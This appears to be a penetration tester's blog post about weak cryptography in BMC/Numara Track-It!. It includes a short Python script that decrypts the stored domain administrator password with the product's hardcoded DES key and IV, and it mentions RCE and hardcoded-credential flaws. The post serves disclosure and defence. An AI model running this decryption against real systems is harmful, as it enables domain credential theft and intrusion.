Today during a Penetration Test of a client I came across a piece of software called “Track-It!” by Numara, who was since acquired by BMC. Now this application is used by IT Helpdesks to offer centralised control of assets, so it was definitely worth a look at from a testing point of view. I found an open (Readable by Domain Users) network share on the installation server named “TrackIt” which internally exposed configuration files such as trackit.cfg which contained intersting lines such as:
Now seeing a line of base64 data after the phrase DomainAdminPass is definitely interesting enough to catch my attention, during the assessment I was able to abuse these configuration files to retrieve the plaintext password and fully compromise the client. A little post assessment research shows that the vulnerability I exploited is known about and already has a Metasploit module.
However I didn’t have Metasploit available during this assessment, I was engaged in a desktop breakout test – however I was able to retrieve the encrypted key and write a small python script to decrypt, which I’ll share here:
import base64 from Crypto.Cipher import DES DomainAdminPass = "l4LCPmUqYdS2mWkeTmHn6w==" cipher_text = base64.b64decode(DomainAdminPass) desa = DES.new('NumaraTI', DES.MODE_CBC, 'NumaraTI') print desa.decrypt(cipher_text)
Provided for you here just in case you stumble across on of these configuration files or this tool in the future. Oh and yeah, the key and IV were both the company/product name – nice move guys.
Turns out the software has an unauthenticated file upload to remote code execution vulnerability, hard coded credentials for the database and weak cryptography protecting exposed domain administrator credentials, amongst other issues. An easy full domain compromise for the attackers and no support for the defenders. If you have BMC/Numera Track-It! deployed in your enterprise I highly recommend you check out the CERT page and do a full review of the security of the installation. These issues affect a spread of versions of this software and any exposure of the configuration file could lead to a full domain compromise.